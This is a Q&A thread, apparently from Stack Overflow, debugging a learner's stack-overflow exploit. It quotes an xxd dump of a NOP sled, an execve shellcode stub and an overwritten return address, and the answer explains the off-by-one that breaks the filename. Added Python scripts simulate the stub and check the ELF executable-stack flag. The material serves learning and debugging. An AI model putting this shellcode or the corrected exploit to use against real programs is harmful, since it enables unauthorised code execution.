Question

I'm learning about stack exploitation using shellcode. I have everything organized, and my shellcode seems to work right up until the last instruction 0xcd 0x80. What is supposed to happen at the end of the shellcode is that the interrupt is sent (branching out of the shellcode) and a file is supposed to be executed that contains further instructions. If I type xxx/aa at the command line, my file runs (the file is named simply aa and it is in a directory called xxx).

The byte representation of my insertion code is this:

0000000: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000010: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000020: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000030: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000040: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000050: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000060: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000070: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000080: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000090: 9090 9090 9090 9090 9090 9090 9090 9090  ................
00000a0: 9090 9090 9090 9090 9090 9090 9090 9090  ................
00000b0: 9090 9090 9090 9090 9090 9090 9090 9090  ................
00000c0: 9090 9090 9090 9090 9090 9090 9090 9090  ................
00000d0: 9090 9090 eb16 5b31 c088 4307 895b 0889  ......[1..C..[..
00000e0: 430c b00b 8d4b 088d 530c cd80 e8e5 ffff  C....K..S.......
00000f0: ff78 7878 2f61 612f 7841 4141 4142 4242  .xxx/aa/xAAAABBB
0000100: 4241 4141 4114 f2ff bf0a                 BAAAA0....

And this both inserts my shellcode and perfectly places the new return address. However, when I run this code, I wind up in an infinite loop. The line 0xcd 0x80 is meant to send an interrupt and supply the argument xxx/aa, just as I type at the command line. However, rather than executing this line, the program just keeps going. Since the next line is a call back to the start of the shellcode, an infinite loop is created. Without the 0xcd 0x80 line to break out of the shellcode, there is no way out of this.

What am I doing wrong? How can I get this command-line behavior to occur in my shellcode? Thanks very much!


Solution

The disassembly of your code looks like this (here in AT&T syntax):

    jmp    pos2
pos1:
    pop    %ebx
    xor    %eax,%eax
    mov    %al,dbyte1-data(%ebx)
    mov    %ebx,dlong1-data(%ebx)
    mov    %eax,dlong2-data(%ebx)
    mov    $0xb,%al
    lea    dlong1-data(%ebx),%ecx
    lea    dlong2-data(%ebx),%edx
    int    $0x80
pos2:
    call   pos1
data:
    .ascii "xxx/aa/"
dbyte1:
    .byte  dont_care // ebx+dbyte1-data = ebx+7
dlong1:
    .long  dont_care // ebx+dlong1-data = ebx+8
dlong2:
    .long  dont_care // ebx+dlong2-data = ebx+0xC
    .byte  dont_care // "AAAA0"

First of all, you can see that this code will run in an endless loop if the "execve" system call (I'm assuming 0xB is execve) fails. Execve, however, will fail because "xxx/aa/" is not a valid file name. It seems the "mov %al,0x7(%ebx)" should really be "0x6(%ebx)".

As already written by "Giel", you may use the "strace" command to see whether execve is really called with "xxx/aa/" instead of "xxx/aa" as the file name.

Some notes you should keep in mind for your next project (not for this one):

Most Linux executables have the "NX" bit set for the stack and data pages. This means that the CPU will not allow executing code from the stack or from data segments. This means that execution of shellcode would not work on most Linux programs but the program would be stopped with a bus exception or a similar exception.
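To make the off-by-one in the answer concrete without running anything, here is an added analysis script (not part of the question or the answer) that rebuilds the bytes from the xxd dump posted above, follows the jmp/call/pop trick to find the data block, applies the three stores the stub performs, and reads back the filename, argv and envp that int $0x80 would receive. It assumes the dump is exactly the xxd format shown and that the stub has the fixed instruction layout the answer disassembled; buffer indices stand in for stack addresses.

```python
import struct

# The xxd dump posted in the question, reproduced here so the script runs offline.
XXD_DUMP = """\
0000000: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000010: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000020: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000030: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000040: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000050: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000060: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000070: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000080: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000090: 9090 9090 9090 9090 9090 9090 9090 9090  ................
00000a0: 9090 9090 9090 9090 9090 9090 9090 9090  ................
00000b0: 9090 9090 9090 9090 9090 9090 9090 9090  ................
00000c0: 9090 9090 9090 9090 9090 9090 9090 9090  ................
00000d0: 9090 9090 eb16 5b31 c088 4307 895b 0889  ......[1..C..[..
00000e0: 430c b00b 8d4b 088d 530c cd80 e8e5 ffff  C....K..S.......
00000f0: ff78 7878 2f61 612f 7841 4141 4142 4242  .xxx/aa/xAAAABBB
0000100: 4241 4141 4114 f2ff bf0a                 BAAAA0....
"""

# Opcode skeleton of the stub after the sled: jmp rel8, pop %ebx, xor %eax,%eax,
# then three [ebx+disp8] stores, mov $imm8,%al, two lea's and int $0x80.
STUB_PATTERN = b"\xeb?\x5b\x31\xc0\x88\x43?\x89\x5b?\x89\x43?\xb0?\x8d\x4b?\x8d\x53?\xcd\x80"


def parse_xxd(text):
    """Rebuild the raw bytes from xxd's 'offset: hexpairs  ascii' lines."""
    buf = bytearray()
    for line in text.splitlines():
        if not line.strip():
            continue
        offset_str, rest = line.split(":", 1)
        hexpart = rest.strip().split("  ")[0]  # the ascii column follows two spaces
        if int(offset_str, 16) != len(buf):
            raise ValueError("dump is not contiguous")
        buf += bytes.fromhex(hexpart.replace(" ", ""))
    return buf


def decode_stub(buf):
    """Locate the stub after the NOP sled and read the displacements it uses."""
    i = next(k for k, b in enumerate(buf) if b != 0x90)
    if any(p != 0x3F and p != b for p, b in zip(STUB_PATTERN, buf[i:i + len(STUB_PATTERN)])):
        raise ValueError("stub does not match the expected instruction layout")
    jmp_target = i + 2 + struct.unpack_from("<b", buf, i + 1)[0]
    if buf[jmp_target] != 0xE8:
        raise ValueError("expected a call at the jmp target")
    call_target = jmp_target + 5 + struct.unpack_from("<i", buf, jmp_target + 1)[0]
    if call_target != i + 2:  # the call must land on 'pop %ebx'
        raise ValueError("call does not return to the pop")
    return {
        "data_start": jmp_target + 5,  # address pushed by call == value popped into ebx
        "byte_store": buf[i + 7],      # mov %al, disp8(%ebx)
        "ptr_store": buf[i + 10],      # mov %ebx, disp8(%ebx)
        "null_store": buf[i + 13],     # mov %eax, disp8(%ebx)
        "syscall": buf[i + 15],        # mov $imm8, %al
        "argv_off": buf[i + 18],       # lea disp8(%ebx), %ecx
        "envp_off": buf[i + 21],       # lea disp8(%ebx), %edx
    }


def simulate_execve_args(buf, byte_store=None):
    """Apply the stub's stores and read back what int $0x80 would see.

    byte_store overrides the disp8 of the 'mov %al' store so the answer's
    proposed 0x6 can be compared with the posted 0x7.
    """
    stub = decode_stub(buf)
    ebx = stub["data_start"]
    if byte_store is None:
        byte_store = stub["byte_store"]
    img = bytearray(buf)
    img[ebx + byte_store] = 0                                  # %al is 0 after the xor
    struct.pack_into("<I", img, ebx + stub["ptr_store"], ebx)  # argv[0] = pointer to the string
    struct.pack_into("<I", img, ebx + stub["null_store"], 0)   # argv[1] / envp[0] = NULL
    filename = bytes(img[ebx:img.index(0, ebx)]).decode("ascii")
    argv = list(struct.unpack_from("<II", img, ebx + stub["argv_off"]))
    envp = [struct.unpack_from("<I", img, ebx + stub["envp_off"])[0]]
    return {"syscall": stub["syscall"], "filename": filename, "argv": argv, "envp": envp}


if __name__ == "__main__":
    code = parse_xxd(XXD_DUMP)
    for disp in (None, 6):
        r = simulate_execve_args(code, disp)
        label = "as posted" if disp is None else "with 0x6(%ebx)"
        print(f"{label}: syscall={r['syscall']:#x} filename={r['filename']!r} argv={r['argv']} envp={r['envp']}")
```

As posted, the NUL byte lands on the 'x' after the trailing slash, so the string passed to execve is "xxx/aa/"; with the displacement changed to 0x6 it overwrites the slash and becomes "xxx/aa". The argv and envp arrays come out as [pointer, NULL] and [NULL] in both cases, which is why strace would show only the filename as the difference.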
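Whether the stack of a given binary is executable is recorded in the ELF program header PT_GNU_STACK, which the kernel reads at exec time. The following added example (not part of the answer) parses that header from raw ELF bytes for both ELF32 and ELF64 and reports the stack permission; the make_minimal_elf helper is a constructed test input (header plus one program header, no code) so the check runs offline.

```python
import struct

PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4


def gnu_stack_flags(elf):
    """Return the p_flags of the PT_GNU_STACK entry, or None if it is absent."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = elf[4], elf[5]
    end = "<" if ei_data == 1 else ">"
    if ei_class == 2:  # ELF64: e_phoff at 32, e_phentsize/e_phnum at 54
        (e_phoff,) = struct.unpack_from(end + "Q", elf, 32)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", elf, 54)
        flags_off = 4   # p_flags directly follows p_type in Elf64_Phdr
    elif ei_class == 1:  # ELF32: e_phoff at 28, e_phentsize/e_phnum at 42
        (e_phoff,) = struct.unpack_from(end + "I", elf, 28)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", elf, 42)
        flags_off = 24  # p_flags is the seventh field of Elf32_Phdr
    else:
        raise ValueError("unknown ELF class")
    for n in range(e_phnum):
        off = e_phoff + n * e_phentsize
        (p_type,) = struct.unpack_from(end + "I", elf, off)
        if p_type == PT_GNU_STACK:
            return struct.unpack_from(end + "I", elf, off + flags_off)[0]
    return None


def describe_stack(elf):
    """Human-readable verdict in the spirit of readelf's GNU_STACK line."""
    flags = gnu_stack_flags(elf)
    if flags is None:
        return "no PT_GNU_STACK (loader falls back to the legacy executable-stack default)"
    if flags & PF_X:
        return "executable stack (RWE)"
    return "non-executable stack (NX)"


def make_minimal_elf(bits, stack_flags=None):
    """Constructed input: a header-only ELF with at most one PT_GNU_STACK entry."""
    phnum = 0 if stack_flags is None else 1
    if bits == 64:
        ehsize, phentsize = 64, 56
        ident = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9)
        hdr = ident + struct.pack("<HHIQQQIHHHHHH", 2, 0x3E, 1, 0,
                                  ehsize if phnum else 0, 0, 0,
                                  ehsize, phentsize, phnum, 0, 0, 0)
        phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags or 0, 0, 0, 0, 0, 0, 16)
    else:
        ehsize, phentsize = 52, 32
        ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)
        hdr = ident + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0,
                                  ehsize if phnum else 0, 0, 0,
                                  ehsize, phentsize, phnum, 0, 0, 0)
        phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags or 0, 16)
    return hdr + (phdr if phnum else b"")


if __name__ == "__main__":
    for bits, flags in ((64, PF_R | PF_W), (32, PF_R | PF_W | PF_X), (64, None)):
        print(bits, describe_stack(make_minimal_elf(bits, flags)))
```

On a real binary the same information is printed by `readelf -lW ./prog | grep GNU_STACK` (RW versus RWE in the flags column), which is the quick way to tell whether stack shellcode could execute at all before spending time on the shellcode itself.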

Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow